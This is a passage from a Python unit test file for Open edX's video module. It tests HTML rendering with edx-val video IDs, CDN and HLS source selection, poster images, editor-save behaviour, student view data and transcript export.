'url': '/edxval/video/example',
'edx_video_id': u'example',
'duration': 111.0,
'client_video_id': u'The example video',
'encoded_videos': [
{
'url': u'http://www.meowmix.com',
'file_size': 25556,
'bitrate': 9600,
'profile': u'desktop_mp4'
}
]
}
context = self.item_descriptor.render(STUDENT_VIEW).content
expected_context = dict(initial_context)
expected_context['metadata'].update({
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'sources': data['result']['sources'],
})
expected_context.update({
'id': self.item_descriptor.location.html_id(),
'download_video_link': data['result']['download_video_link'],
'metadata': json.dumps(expected_context['metadata'])
})
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
def test_get_html_with_existing_edx_video_id(self):
"""
Tests the `VideoModule` `get_html` where `edx_video_id` is given and related video is found
"""
edx_video_id = 'thundercats'
# create video with provided edx_video_id and return encoded_videos
encoded_videos = self.encode_and_create_video(edx_video_id)
# data to be used to retrieve video by edxval API
data = {
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'edx_video_id': edx_video_id,
'result': {
'download_video_link': u'http://fake-video.edx.org/{}.mp4'.format(edx_video_id),
'sources': [u'example.mp4', u'example.webm'] + [video['url'] for video in encoded_videos],
},
}
# context returned by get_html when provided with above data
# expected_context, a dict to assert with context
context, expected_context = self.helper_get_html_with_edx_video_id(data)
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
def test_get_html_with_existing_unstripped_edx_video_id(self):
"""
Tests the `VideoModule` `get_html` where `edx_video_id` with some unwanted tab(\t)
is given and related video is found
"""
edx_video_id = 'thundercats'
# create video with provided edx_video_id and return encoded_videos
encoded_videos = self.encode_and_create_video(edx_video_id)
# data to be used to retrieve video by edxval API
# unstripped edx_video_id is provided here
data = {
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="example.mp4"/>
<source src="example.webm"/>
""",
'edx_video_id': "{}\t".format(edx_video_id),
'result': {
'download_video_link': u'http://fake-video.edx.org/{}.mp4'.format(edx_video_id),
'sources': [u'example.mp4', u'example.webm'] + [video['url'] for video in encoded_videos],
},
}
# context returned by get_html when provided with above data
# expected_context, a dict to assert with context
context, expected_context = self.helper_get_html_with_edx_video_id(data)
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
def encode_and_create_video(self, edx_video_id):
"""
Create and encode video to be used for tests
"""
encoded_videos = []
for profile, extension in [("desktop_webm", "webm"), ("desktop_mp4", "mp4")]:
create_profile(profile)
encoded_videos.append(
dict(
url=u"http://fake-video.edx.org/{}.{}".format(edx_video_id, extension),
file_size=9000,
bitrate=42,
profile=profile,
)
)
result = create_video(
dict(
client_video_id='A Client Video id',
duration=111.0,
edx_video_id=edx_video_id,
status='test',
encoded_videos=encoded_videos,
)
)
self.assertEqual(result, edx_video_id)
return encoded_videos
def helper_get_html_with_edx_video_id(self, data):
"""
Create expected context and get actual context returned by `get_html` method.
"""
# make sure the urls for the various encodings are included as part of the alternative sources.
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
start_time="01:00:03" end_time="01:00:10"
edx_video_id="{edx_video_id}"
>
{sources}
</video>
"""
# Video found for edx_video_id
metadata = self.default_metadata_dict
metadata['sources'] = ""
initial_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
'metadata': metadata,
}
# pylint: disable=invalid-name
DATA = SOURCE_XML.format(
download_video=data['download_video'],
source=data['source'],
sources=data['sources'],
edx_video_id=data['edx_video_id']
)
self.initialize_module(data=DATA)
# context returned by get_html
context = self.item_descriptor.render(STUDENT_VIEW).content
# expected_context, expected context to be returned by get_html
expected_context = dict(initial_context)
expected_context['metadata'].update({
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'sources': data['result']['sources'],
})
expected_context.update({
'id': self.item_descriptor.location.html_id(),
'download_video_link': data['result']['download_video_link'],
'metadata': json.dumps(expected_context['metadata'])
})
return context, expected_context
# pylint: disable=invalid-name
@patch('xmodule.video_module.video_module.BrandingInfoConfig')
@patch('xmodule.video_module.video_module.rewrite_video_url')
def test_get_html_cdn_source(self, mocked_get_video, mock_BrandingInfoConfig):
"""
Test if sources got from CDN
"""
mock_BrandingInfoConfig.get_config.return_value = {
"CN": {
'url': 'http://www.xuetangx.com',
'logo_src': 'http://www.xuetangx.com/static/images/logo.png',
'logo_tag': 'Video hosted by XuetangX.com'
}
}
def side_effect(*args, **kwargs):
cdn = {
'http://example.com/example.mp4': 'http://cdn-example.com/example.mp4',
'http://example.com/example.webm': 'http://cdn-example.com/example.webm',
}
return cdn.get(args[1])
mocked_get_video.side_effect = side_effect
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson" source="{source}"
download_video="{download_video}"
edx_video_id="{edx_video_id}"
start_time="01:00:03" end_time="01:00:10"
>
{sources}
</video>
"""
case_data = {
'download_video': 'true',
'source': 'example_source.mp4',
'sources': """
<source src="http://example.com/example.mp4"/>
<source src="http://example.com/example.webm"/>
""",
'result': {
'download_video_link': u'example_source.mp4',
'sources': [
u'http://cdn-example.com/example.mp4',
u'http://cdn-example.com/example.webm'
],
},
}
# test with and without edx_video_id specified.
cases = [
dict(case_data, edx_video_id=""),
dict(case_data, edx_video_id="vid-v1:12345"),
]
initial_context = {
'autoadvance_enabled': False,
'branding_info': {
'logo_src': 'http://www.xuetangx.com/static/images/logo.png',
'logo_tag': 'Video hosted by XuetangX.com',
'url': 'http://www.xuetangx.com'
},
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': None,
'handout': None,
'id': None,
'metadata': self.default_metadata_dict,
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
initial_context['metadata']['duration'] = None
for data in cases:
DATA = SOURCE_XML.format(
download_video=data['download_video'],
source=data['source'],
sources=data['sources'],
edx_video_id=data['edx_video_id'],
)
self.initialize_module(data=DATA)
self.item_descriptor.xmodule_runtime.user_location = 'CN'
context = self.item_descriptor.render('student_view').content
expected_context = dict(initial_context)
expected_context['metadata'].update({
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'sources': data['result'].get('sources', []),
})
expected_context.update({
'id': self.item_descriptor.location.html_id(),
'download_video_link': data['result'].get('download_video_link'),
'metadata': json.dumps(expected_context['metadata'])
})
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
)
@ddt.data(
(True, ['youtube', 'desktop_webm', 'desktop_mp4', 'hls']),
(False, ['youtube', 'desktop_webm', 'desktop_mp4'])
)
@ddt.unpack
def test_get_html_on_toggling_hls_feature(self, hls_feature_enabled, expected_val_profiles):
"""
Verify val profiles on toggling HLS Playback feature.
"""
with patch('xmodule.video_module.video_module.edxval_api.get_urls_for_profiles') as get_urls_for_profiles:
get_urls_for_profiles.return_value = {
'desktop_webm': 'https://webm.com/dw.webm',
'hls': 'https://hls.com/hls.m3u8',
'youtube': 'https://yt.com/?v=v0TFmdO4ZP0',
'desktop_mp4': 'https://mp4.com/dm.mp4'
}
with patch('xmodule.video_module.video_module.HLSPlaybackEnabledFlag.feature_enabled') as feature_enabled:
feature_enabled.return_value = hls_feature_enabled
video_xml = '<video display_name="Video" download_video="true" edx_video_id="12345-67890">[]</video>'
self.initialize_module(data=video_xml)
self.item_descriptor.render(STUDENT_VIEW)
get_urls_for_profiles.assert_called_with(
self.item_descriptor.edx_video_id,
expected_val_profiles,
)
@patch('xmodule.video_module.video_module.HLSPlaybackEnabledFlag.feature_enabled', Mock(return_value=True))
@patch('xmodule.video_module.video_module.edxval_api.get_urls_for_profiles')
def test_get_html_hls(self, get_urls_for_profiles):
"""
Verify that hls profile functionality works as expected.
* HLS source should be added into list of available sources
* HLS source should not be used for download URL If available from edxval
"""
video_xml = '<video display_name="Video" download_video="true" edx_video_id="12345-67890">[]</video>'
get_urls_for_profiles.return_value = {
'desktop_webm': 'https://webm.com/dw.webm',
'hls': 'https://hls.com/hls.m3u8',
'youtube': 'https://yt.com/?v=v0TFmdO4ZP0',
'desktop_mp4': 'https://mp4.com/dm.mp4'
}
self.initialize_module(data=video_xml)
context = self.item_descriptor.render(STUDENT_VIEW).content
self.assertIn("'download_video_link': 'https://mp4.com/dm.mp4'", context)
self.assertIn('"streams": "1.00:https://yt.com/?v=v0TFmdO4ZP0"', context)
self.assertIn(
'"sources": ["https://webm.com/dw.webm", "https://mp4.com/dm.mp4", "https://hls.com/hls.m3u8"]', context
)
def test_get_html_hls_no_video_id(self):
"""
Verify that `download_video_link` is set to None for HLS videos if no video id
"""
video_xml = """
<video display_name="Video" download_video="true" source="https://hls.com/hls.m3u8">
["https://hls.com/hls2.m3u8", "https://hls.com/hls3.m3u8"]
</video>
"""
self.initialize_module(data=video_xml)
context = self.item_descriptor.render(STUDENT_VIEW).content
self.assertIn("'download_video_link': None", context)
@patch('xmodule.video_module.video_module.edxval_api.get_course_video_image_url')
def test_poster_image(self, get_course_video_image_url):
"""
Verify that poster image functionality works as expected.
"""
video_xml = '<video display_name="Video" download_video="true" edx_video_id="12345-67890">[]</video>'
get_course_video_image_url.return_value = '/media/video-images/poster.png'
self.initialize_module(data=video_xml)
context = self.item_descriptor.render(STUDENT_VIEW).content
self.assertIn('"poster": "/media/video-images/poster.png"', context)
@patch('xmodule.video_module.video_module.edxval_api.get_course_video_image_url')
def test_poster_image_without_edx_video_id(self, get_course_video_image_url):
"""
Verify that poster image is set to None and there is no crash when no edx_video_id.
"""
video_xml = '<video display_name="Video" download_video="true" edx_video_id="null">[]</video>'
get_course_video_image_url.return_value = '/media/video-images/poster.png'
self.initialize_module(data=video_xml)
context = self.item_descriptor.render(STUDENT_VIEW).content
self.assertIn("\'poster\': \'null\'", context)
@attr(shard=7)
@ddt.ddt
class TestVideoDescriptorInitialization(BaseTestXmodule):
"""
Make sure that module initialization works correctly.
"""
CATEGORY = "video"
DATA = SOURCE_XML
METADATA = {}
def setUp(self):
super(TestVideoDescriptorInitialization, self).setUp()
self.setup_course()
def test_source_not_in_html5sources(self):
metadata = {
'source': 'http://example.org/video.mp4',
'html5_sources': ['http://youtu.be/3_yD_cEKoCk.mp4'],
}
self.initialize_module(metadata=metadata)
fields = self.item_descriptor.editable_metadata_fields
self.assertIn('source', fields)
self.assertEqual(self.item_descriptor.source, 'http://example.org/video.mp4')
self.assertTrue(self.item_descriptor.download_video)
self.assertTrue(self.item_descriptor.source_visible)
def test_source_in_html5sources(self):
metadata = {
'source': 'http://example.org/video.mp4',
'html5_sources': ['http://example.org/video.mp4'],
}
self.initialize_module(metadata=metadata)
fields = self.item_descriptor.editable_metadata_fields
self.assertNotIn('source', fields)
self.assertTrue(self.item_descriptor.download_video)
self.assertFalse(self.item_descriptor.source_visible)
def test_download_video_is_explicitly_set(self):
metadata = {
'track': u'http://some_track.srt',
'source': 'http://example.org/video.mp4',
'html5_sources': ['http://youtu.be/3_yD_cEKoCk.mp4'],
'download_video': False,
}
self.initialize_module(metadata=metadata)
fields = self.item_descriptor.editable_metadata_fields
self.assertIn('source', fields)
self.assertIn('download_video', fields)
self.assertFalse(self.item_descriptor.download_video)
self.assertTrue(self.item_descriptor.source_visible)
self.assertTrue(self.item_descriptor.download_track)
def test_source_is_empty(self):
metadata = {
'source': '',
'html5_sources': ['http://youtu.be/3_yD_cEKoCk.mp4'],
}
self.initialize_module(metadata=metadata)
fields = self.item_descriptor.editable_metadata_fields
self.assertNotIn('source', fields)
self.assertFalse(self.item_descriptor.download_video)
@ddt.data(
(
{
'youtube': 'v0TFmdO4ZP0',
'hls': 'https://hls.com/hls.m3u8',
'desktop_mp4': 'https://mp4.com/dm.mp4',
'desktop_webm': 'https://webm.com/dw.webm',
},
['https://www.youtube.com/watch?v=v0TFmdO4ZP0']
),
(
{
'youtube': None,
'hls': 'https://hls.com/hls.m3u8',
'desktop_mp4': 'https://mp4.com/dm.mp4',
'desktop_webm': 'https://webm.com/dw.webm',
},
['https://www.youtube.com/watch?v=3_yD_cEKoCk']
),
(
{
'youtube': None,
'hls': None,
'desktop_mp4': None,
'desktop_webm': None,
},
['https://www.youtube.com/watch?v=3_yD_cEKoCk']
),
)
@ddt.unpack
@patch('xmodule.video_module.video_module.HLSPlaybackEnabledFlag.feature_enabled', Mock(return_value=True))
def test_val_encoding_in_context(self, val_video_encodings, video_url):
"""
Tests that the val encodings correctly override the video url when the edx video id is set and
one or more encodings are present.
Accepted order of source priority is:
VAL's youtube source > external youtube source > hls > mp4 > webm.
Note that `https://www.youtube.com/watch?v=3_yD_cEKoCk` is the default youtube source with which
a video component is initialized. Current implementation considers this youtube source as a valid
external youtube source.
"""
with patch('xmodule.video_module.video_module.edxval_api.get_urls_for_profiles') as get_urls_for_profiles:
get_urls_for_profiles.return_value = val_video_encodings
self.initialize_module(
data='<video display_name="Video" download_video="true" edx_video_id="12345-67890">[]</video>'
)
context = self.item_descriptor.get_context()
self.assertEqual(context['transcripts_basic_tab_metadata']['video_url']['value'], video_url)
@ddt.data(
(
{
'youtube': None,
'hls': 'https://hls.com/hls.m3u8',
'desktop_mp4': 'https://mp4.com/dm.mp4',
'desktop_webm': 'https://webm.com/dw.webm',
},
['https://hls.com/hls.m3u8']
),
(
{
'youtube': 'v0TFmdO4ZP0',
'hls': 'https://hls.com/hls.m3u8',
'desktop_mp4': None,
'desktop_webm': 'https://webm.com/dw.webm',
},
['https://www.youtube.com/watch?v=v0TFmdO4ZP0']
),
)
@ddt.unpack
@patch('xmodule.video_module.video_module.HLSPlaybackEnabledFlag.feature_enabled', Mock(return_value=True))
def test_val_encoding_in_context_without_external_youtube_source(self, val_video_encodings, video_url):
"""
Tests that the val encodings correctly override the video url when the edx video id is set and
one or more encodings are present. In this scenerio no external youtube source is provided.
Accepted order of source priority is:
VAL's youtube source > external youtube source > hls > mp4 > webm.
"""
with patch('xmodule.video_module.video_module.edxval_api.get_urls_for_profiles') as get_urls_for_profiles:
get_urls_for_profiles.return_value = val_video_encodings
self.initialize_module(
data='<video display_name="Video" youtube_id_1_0="" download_video="true" edx_video_id="12345-67890">[]</video>'
)
context = self.item_descriptor.get_context()
self.assertEqual(context['transcripts_basic_tab_metadata']['video_url']['value'], video_url)
@attr(shard=7)
@ddt.ddt
class TestEditorSavedMethod(BaseTestXmodule):
"""
Make sure that `editor_saved` method works correctly.
"""
CATEGORY = "video"
DATA = SOURCE_XML
METADATA = {}
def setUp(self):
super(TestEditorSavedMethod, self).setUp()
self.setup_course()
self.metadata = {
'source': 'http://youtu.be/3_yD_cEKoCk',
'html5_sources': ['http://example.org/video.mp4'],
}
# path to subs_3_yD_cEKoCk.srt.sjson file
self.file_name = 'subs_3_yD_cEKoCk.srt.sjson'
# pylint: disable=no-value-for-parameter
self.test_dir = path(__file__).abspath().dirname().dirname().dirname().dirname().dirname()
self.file_path = self.test_dir + '/common/test/data/uploads/' + self.file_name
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_editor_saved_when_html5_sub_not_exist(self, default_store):
"""
When there is youtube_sub exist but no html5_sub present for
html5_sources, editor_saved function will generate new html5_sub
for video.
"""
self.MODULESTORE = MODULESTORES[default_store] # pylint: disable=invalid-name
self.initialize_module(metadata=self.metadata)
item = self.store.get_item(self.item_descriptor.location)
with open(self.file_path, "r") as myfile:
save_to_store(myfile.read(), self.file_name, 'text/sjson', item.location)
item.sub = "3_yD_cEKoCk"
# subs_video.srt.sjson does not exist before calling editor_saved function
with self.assertRaises(NotFoundError):
Transcript.get_asset(item.location, 'subs_video.srt.sjson')
old_metadata = own_metadata(item)
# calling editor_saved will generate new file subs_video.srt.sjson for html5_sources
item.editor_saved(self.user, old_metadata, None)
self.assertIsInstance(Transcript.get_asset(item.location, 'subs_3_yD_cEKoCk.srt.sjson'), StaticContent)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_editor_saved_when_youtube_and_html5_subs_exist(self, default_store):
"""
When both youtube_sub and html5_sub already exist then no new
sub will be generated by editor_saved function.
"""
self.MODULESTORE = MODULESTORES[default_store]
self.initialize_module(metadata=self.metadata)
item = self.store.get_item(self.item_descriptor.location)
with open(self.file_path, "r") as myfile:
save_to_store(myfile.read(), self.file_name, 'text/sjson', item.location)
save_to_store(myfile.read(), 'subs_video.srt.sjson', 'text/sjson', item.location)
item.sub = "3_yD_cEKoCk"
# subs_3_yD_cEKoCk.srt.sjson and subs_video.srt.sjson already exist
self.assertIsInstance(Transcript.get_asset(item.location, self.file_name), StaticContent)
self.assertIsInstance(Transcript.get_asset(item.location, 'subs_video.srt.sjson'), StaticContent)
old_metadata = own_metadata(item)
with patch('xmodule.video_module.video_module.manage_video_subtitles_save') as manage_video_subtitles_save:
item.editor_saved(self.user, old_metadata, None)
self.assertFalse(manage_video_subtitles_save.called)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_editor_saved_with_unstripped_video_id(self, default_store):
"""
Verify editor saved when video id contains spaces/tabs.
"""
self.MODULESTORE = MODULESTORES[default_store]
stripped_video_id = unicode(uuid4())
unstripped_video_id = u'{video_id}{tabs}'.format(video_id=stripped_video_id, tabs=u'\t\t\t')
self.metadata.update({
'edx_video_id': unstripped_video_id
})
self.initialize_module(metadata=self.metadata)
item = self.store.get_item(self.item_descriptor.location)
self.assertEqual(item.edx_video_id, unstripped_video_id)
# Now, modifying and saving the video module should strip the video id.
old_metadata = own_metadata(item)
item.display_name = u'New display name'
item.editor_saved(self.user, old_metadata, None)
self.assertEqual(item.edx_video_id, stripped_video_id)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
@patch('xmodule.video_module.video_module.edxval_api.get_url_for_profile', Mock(return_value='test_yt_id'))
def test_editor_saved_with_yt_val_profile(self, default_store):
"""
Verify editor saved overrides `youtube_id_1_0` when a youtube val profile is there
for a given `edx_video_id`.
"""
self.MODULESTORE = MODULESTORES[default_store]
self.initialize_module(metadata=self.metadata)
item = self.store.get_item(self.item_descriptor.location)
self.assertEqual(item.youtube_id_1_0, '3_yD_cEKoCk')
# Now, modify `edx_video_id` and save should override `youtube_id_1_0`.
old_metadata = own_metadata(item)
item.edx_video_id = unicode(uuid4())
item.editor_saved(self.user, old_metadata, None)
self.assertEqual(item.youtube_id_1_0, 'test_yt_id')
@ddt.ddt
class TestVideoDescriptorStudentViewJson(TestCase):
"""
Tests for the student_view_data method on VideoDescriptor.
"""
TEST_DURATION = 111.0
TEST_PROFILE = "mobile"
TEST_SOURCE_URL = "http://www.example.com/source.mp4"
TEST_LANGUAGE = "ge"
TEST_ENCODED_VIDEO = {
'profile': TEST_PROFILE,
'bitrate': 333,
'url': 'http://example.com/video',
'file_size': 222,
}
TEST_EDX_VIDEO_ID = 'test_edx_video_id'
TEST_YOUTUBE_ID = 'test_youtube_id'
TEST_YOUTUBE_EXPECTED_URL = 'https://www.youtube.com/watch?v=test_youtube_id'
def setUp(self):
super(TestVideoDescriptorStudentViewJson, self).setUp()
video_declaration = (
"<video display_name='Test Video' edx_video_id='123' youtube_id_1_0=\'" + self.TEST_YOUTUBE_ID + "\'>"
)
sample_xml = ''.join([
video_declaration,
"<source src='", self.TEST_SOURCE_URL, "'/> ",
"<transcript language='", self.TEST_LANGUAGE, "' src='german_translation.srt' /> ",
"</video>"]
)
self.transcript_url = "transcript_url"
self.video = instantiate_descriptor(data=sample_xml)
self.video.runtime.handler_url = Mock(return_value=self.transcript_url)
self.video.runtime.course_id = MagicMock()
def setup_val_video(self, associate_course_in_val=False):
"""
Creates a video entry in VAL.
Arguments:
associate_course - If True, associates the test course with the video in VAL.
"""
create_profile('mobile')
create_video({
'edx_video_id': self.TEST_EDX_VIDEO_ID,
'client_video_id': 'test_client_video_id',
'duration': self.TEST_DURATION,
'status': 'dummy',
'encoded_videos': [self.TEST_ENCODED_VIDEO],
'courses': [unicode(self.video.location.course_key)] if associate_course_in_val else [],
})
self.val_video = get_video_info(self.TEST_EDX_VIDEO_ID) # pylint: disable=attribute-defined-outside-init
def get_result(self, allow_cache_miss=True):
"""
Returns the result from calling the video's student_view_data method.
Arguments:
allow_cache_miss is passed in the context to the student_view_data method.
"""
context = {
"profiles": [self.TEST_PROFILE],
"allow_cache_miss": "True" if allow_cache_miss else "False"
}
return self.video.student_view_data(context)
def verify_result_with_fallback_and_youtube(self, result):
"""
Verifies the result is as expected when returning "fallback" video data (not from VAL).
"""
self.assertDictEqual(
result,
{
"only_on_web": False,
"duration": None,
"transcripts": {self.TEST_LANGUAGE: self.transcript_url},
"encoded_videos": {
"fallback": {"url": self.TEST_SOURCE_URL, "file_size": 0},
"youtube": {"url": self.TEST_YOUTUBE_EXPECTED_URL, "file_size": 0}
},
"all_sources": [self.TEST_SOURCE_URL],
}
)
def verify_result_with_youtube_url(self, result):
"""
Verifies the result is as expected when returning "fallback" video data (not from VAL).
"""
self.assertDictEqual(
result,
{
"only_on_web": False,
"duration": None,
"transcripts": {self.TEST_LANGUAGE: self.transcript_url},
"encoded_videos": {"youtube": {"url": self.TEST_YOUTUBE_EXPECTED_URL, "file_size": 0}},
"all_sources": [],
}
)
def verify_result_with_val_profile(self, result):
"""
Verifies the result is as expected when returning video data from VAL.
"""
self.assertDictContainsSubset(
result.pop("encoded_videos")[self.TEST_PROFILE],
self.TEST_ENCODED_VIDEO,
)
self.assertDictEqual(
result,
{
"only_on_web": False,
"duration": self.TEST_DURATION,
"transcripts": {self.TEST_LANGUAGE: self.transcript_url},
'all_sources': [self.TEST_SOURCE_URL],
}
)
def test_only_on_web(self):
self.video.only_on_web = True
result = self.get_result()
self.assertDictEqual(result, {"only_on_web": True})
def test_no_edx_video_id(self):
result = self.get_result()
self.verify_result_with_fallback_and_youtube(result)
def test_no_edx_video_id_and_no_fallback(self):
video_declaration = "<video display_name='Test Video' youtube_id_1_0=\'{}\'>".format(self.TEST_YOUTUBE_ID)
# the video has no source listed, only a youtube link, so no fallback url will be provided
sample_xml = ''.join([
video_declaration,
"<transcript language='", self.TEST_LANGUAGE, "' src='german_translation.srt' /> ",
"</video>"
])
self.transcript_url = "transcript_url"
self.video = instantiate_descriptor(data=sample_xml)
self.video.runtime.handler_url = Mock(return_value=self.transcript_url)
self.video.runtime.course_id = MagicMock()
result = self.get_result()
self.verify_result_with_youtube_url(result)
@ddt.data(True, False)
def test_with_edx_video_id_video_associated_in_val(self, allow_cache_miss):
"""
Tests retrieving a video that is stored in VAL and associated with a course in VAL.
"""
self.video.edx_video_id = self.TEST_EDX_VIDEO_ID
self.setup_val_video(associate_course_in_val=True)
# the video is associated in VAL so no cache miss should ever happen but test retrieval in both contexts
result = self.get_result(allow_cache_miss)
self.verify_result_with_val_profile(result)
@ddt.data(True, False)
def test_with_edx_video_id_video_unassociated_in_val(self, allow_cache_miss):
"""
Tests retrieving a video that is stored in VAL but not associated with a course in VAL.
"""
self.video.edx_video_id = self.TEST_EDX_VIDEO_ID
self.setup_val_video(associate_course_in_val=False)
result = self.get_result(allow_cache_miss)
if allow_cache_miss:
self.verify_result_with_val_profile(result)
else:
self.verify_result_with_fallback_and_youtube(result)
@ddt.data(True, False)
def test_with_edx_video_id_video_not_in_val(self, allow_cache_miss):
"""
Tests retrieving a video that is not stored in VAL.
"""
self.video.edx_video_id = self.TEST_EDX_VIDEO_ID
# The video is not in VAL so in contexts that do and don't allow cache misses we should always get a fallback
result = self.get_result(allow_cache_miss)
self.verify_result_with_fallback_and_youtube(result)
@ddt.data(
({}, '', [], ['en']),
({}, '', ['de'], ['de']),
({}, '', ['en', 'de'], ['en', 'de']),
({}, 'en-subs', ['de'], ['en', 'de']),
({'uk': 1}, 'en-subs', ['de'], ['en', 'uk', 'de']),
({'uk': 1, 'de': 1}, 'en-subs', ['de', 'en'], ['en', 'uk', 'de']),
)
@ddt.unpack
@patch('xmodule.video_module.transcripts_utils.edxval_api.get_available_transcript_languages')
def test_student_view_with_val_transcripts_enabled(self, transcripts, english_sub, val_transcripts,
expected_transcripts, mock_get_transcript_languages):
"""
Test `student_view_data` with edx-val transcripts enabled.
"""
mock_get_transcript_languages.return_value = val_transcripts
self.video.transcripts = transcripts
self.video.sub = english_sub
student_view_response = self.get_result()
self.assertItemsEqual(student_view_response['transcripts'].keys(), expected_transcripts)
@attr(shard=7)
@ddt.ddt
class VideoDescriptorTest(TestCase, VideoDescriptorTestBase):
"""
Tests for video descriptor that requires access to django settings.
"""
def setUp(self):
super(VideoDescriptorTest, self).setUp()
self.descriptor.runtime.handler_url = MagicMock()
self.descriptor.runtime.course_id = MagicMock()
self.temp_dir = mkdtemp()
file_system = OSFS(self.temp_dir)
self.file_system = file_system.makedir(EXPORT_IMPORT_COURSE_DIR, recreate=True)
self.addCleanup(shutil.rmtree, self.temp_dir)
def get_video_transcript_data(self, video_id, language_code='en', file_format='srt', provider='Custom'):
return dict(
video_id=video_id,
language_code=language_code,
provider=provider,
file_format=file_format,
)
def test_get_context(self):
""""
Test get_context.
This test is located here and not in xmodule.tests because get_context calls editable_metadata_fields.
Which, in turn, uses settings.LANGUAGES from django setttings.
"""
correct_tabs = [
{
'name': "Basic",
'template': "video/transcripts.html",
'current': True
},
{
'name': 'Advanced',
'template': 'tabs/metadata-edit-tab.html'
}
]
rendered_context = self.descriptor.get_context()
self.assertListEqual(rendered_context['tabs'], correct_tabs)
# Assert that the Video ID field is present in basic tab metadata context.
self.assertEqual(
rendered_context['transcripts_basic_tab_metadata']['edx_video_id'],
self.descriptor.editable_metadata_fields['edx_video_id']
)
def test_export_val_data_with_internal(self):
"""
Tests that exported VAL videos are working as expected.
"""
language_code = 'ar'
transcript_file_name = 'test_edx_video_id-ar.srt'
expected_transcript_path = combine(
combine(self.temp_dir, EXPORT_IMPORT_COURSE_DIR),
combine(EXPORT_IMPORT_STATIC_DIR, transcript_file_name)
)
self.descriptor.edx_video_id = 'test_edx_video_id'
create_profile('mobile')
create_video({
'edx_video_id': self.descriptor.edx_video_id,
'client_video_id': 'test_client_video_id',
'duration': 111.0,
'status': 'dummy',
'encoded_videos': [{
'profile': 'mobile',
'url': 'http://example.com/video',
'file_size': 222,
'bitrate': 333,
}],
})
create_or_update_video_transcript(
video_id=self.descriptor.edx_video_id,
language_code=language_code,
metadata={
'provider': 'Cielo24',
'file_format': 'srt'
},
file_data=ContentFile(TRANSCRIPT_FILE_SRT_DATA)
)
actual = self.descriptor.definition_to_xml(resource_fs=self.file_system)
expected_str = """
<video download_video="false" url_name="SampleProblem" transcripts='{transcripts}'>
<video_asset client_video_id="test_client_video_id" duration="111.0" image="">
<encoded_video profile="mobile" url="http://example.com/video" file_size="222" bitrate="333"/>
<transcripts>
<transcript file_format="srt" language_code="{language_code}" provider="Cielo24"/>
</transcripts>
</video_asset>
<transcript language="{language_code}" src="{transcript_file}"/>
</video>
""".format(
language_code=language_code,
transcript_file=transcript_file_name,
transcripts=json.dumps({language_code: transcript_file_name})
)
parser = etree.XMLParser(remove_blank_text=True)
expected = etree.XML(expected_str, parser=parser)
self.assertXmlEqual(expected, actual)
# Verify transcript file is created.
self.assertEqual([transcript_file_name], self.file_system.listdir(EXPORT_IMPORT_STATIC_DIR))
# Also verify the content of created transcript file.
expected_transcript_content = File(open(expected_transcript_path)).read()
transcript = get_video_transcript_data(video_id=self.descriptor.edx_video_id, language_code=language_code)
self.assertEqual(transcript['content'], expected_transcript_content)
@ddt.data(
(['en', 'da'], 'test_sub', ''),
(['da'], 'test_sub', 'test_sub')
)
@ddt.unpack
def test_export_val_transcripts_backward_compatibility(self, languages, sub, expected_sub):
"""
Tests new transcripts export for backward compatibility.
"""
self.descriptor.edx_video_id = 'test_video_id'
self.descriptor.sub = sub
# Setup VAL encode profile, video and transcripts
create_profile('mobile')
create_video({
'edx_video_id': self.descriptor.edx_video_id,
'client_video_id': 'test_client_video_id',
'duration': 111.0,
'status': 'dummy',
'encoded_videos': [{
'profile': 'mobile',
'url': 'http://example.com/video',
'file_size': 222,
'bitrate': 333,
}],
})
for language in languages:
create_video_transcript(
video_id=self.descriptor.edx_video_id,
language_code=language,
file_format=Transcript.SRT,
content=ContentFile(TRANSCRIPT_FILE_SRT_DATA)
)
# Export the video module into xml
video_xml = self.descriptor.definition_to_xml(resource_fs=self.file_system)
# Assert `sub` and `transcripts` attribute in the xml
self.assertEqual(video_xml.get('sub'), expected_sub)
expected_transcripts = {
